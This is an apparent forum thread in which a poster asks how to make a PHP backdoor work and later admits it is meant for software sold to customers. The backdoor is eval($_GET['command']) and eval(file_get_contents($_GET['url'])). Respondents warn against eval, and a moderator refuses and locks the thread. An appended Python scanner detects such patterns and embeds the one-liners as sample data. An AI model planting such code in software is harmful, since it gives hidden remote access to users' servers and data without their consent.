GET LINK + EVAL

Hello,
I’ve got a little issue with my script. Basically my script looks like this:

<?php eval($_GET['command']); ?>

And what I want to do is simply pass a command file_get_contents to execute php script from a remote site so it should be something like
http://myurl.com/index.php?command=file_get_contents('remote_url/script.txt');
But yet the code fails to execute.

Any suggestions?

If your PHP installation includes suhosin, I’m pretty sure it stops eval();

Also: (From php.net)

Caution The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

Interesting, so what’s the use of eval then? It allows me to pass echo and exit commands, but that’s pretty much it. Is there any possible way to execute a mysql query through eval? Or is eval just useless in this case and if so have you got any other suggestions?

It also allows someone who knows what he’s doing to dump your database or publish your %secret% folder. Eval is a door onto the server.
The rule of thumb with eval is “If you think you need eval, you’re doing something wrong”.

To run any query (on MySQL) you use “mysql_query( $query )”, where you can get the query from an HTML form if you want (I myself am even wary of that and prefer to let people choose conditions but always construct the query myself).

Eval is probably still around because it has its uses. If you make sure you’re the only one touching what eval evals there is no big risk.

Hope this clarified something
Good luck!
O.

I probably should have made myself clear at the beginning… Basically I’ve created a few systems that I’m selling to quite a few customers and I don’t want them getting shared, therefore I’ve included a little backdoor which would give me access to the files or database if such action occurred. I’ve used eval and as far as I know it used to work as intended back in the day, never really looked back on it since now and I’m just looking for a simple 1 line solution… So I’m guessing eval(file_get_contents($_GET['url'])) should do the trick and then just create a txt file with my own php functions?

In that case I am definitely not going to assist with this. Making backdoors such as this that you are planning to sell is highly immoral. It would give you the potential to hack a whole system by running a simple code. As such I feel I should lock this topic as well.
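As an added example from the defender's side (not code from this thread or any of its posters), here is a small Python heuristic that scans PHP source for the pattern the thread warns about: eval() fed by request input, by remotely fetched content, or by a variable assigned from either. The sample PHP it runs over is constructed for the example and includes the two one-liners discussed above.

```python
import re

# Constructed PHP sample for the example; not taken from any real site.
SAMPLE_PHP = """<?php
eval($_GET['command']);
eval(file_get_contents($_GET['url']));
$cmd = $_REQUEST['c'];
eval($cmd);
eval('return 1 + 1;');
echo htmlspecialchars($_GET['name']);
"""

# Superglobals that carry attacker-controlled request data.
TAINT_SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")
# Calls that pull content (possibly code) from an attacker-chosen location.
REMOTE_FETCH = ("file_get_contents(", "curl_exec(", "fopen(")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(.+?);")
EVAL_CALL = re.compile(r"\beval\s*\((.*)\)")


def taint_reason(expr, tainted_vars):
    """Why an expression is dangerous as an eval() argument, or None."""
    if any(fn in expr for fn in REMOTE_FETCH):
        return "remotely fetched content"
    if any(src in expr for src in TAINT_SOURCES):
        return "request input"
    for var, reason in tainted_vars.items():
        if re.search(re.escape(var) + r"\b", expr):
            return reason + " via " + var
    return None


def scan_eval(php_source):
    """Return [(line_no, reason)] for every eval() whose argument is tainted.
    Heuristic only: straight-line, single-file tracking of `$var = ...;`."""
    findings, tainted = [], {}
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for m in EVAL_CALL.finditer(line):
            reason = taint_reason(m.group(1), tainted)
            if reason:
                findings.append((line_no, reason))
        for var, rhs in ASSIGN.findall(line):
            reason = taint_reason(rhs, tainted)
            if reason:
                tainted[var] = reason
    return findings


if __name__ == "__main__":
    for line_no, reason in scan_eval(SAMPLE_PHP):
        print(f"line {line_no}: eval() fed by {reason}")
```

A hit is a review item, not a verdict: real code bases need proper data-flow analysis, but this catches the shapes shown in the thread.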
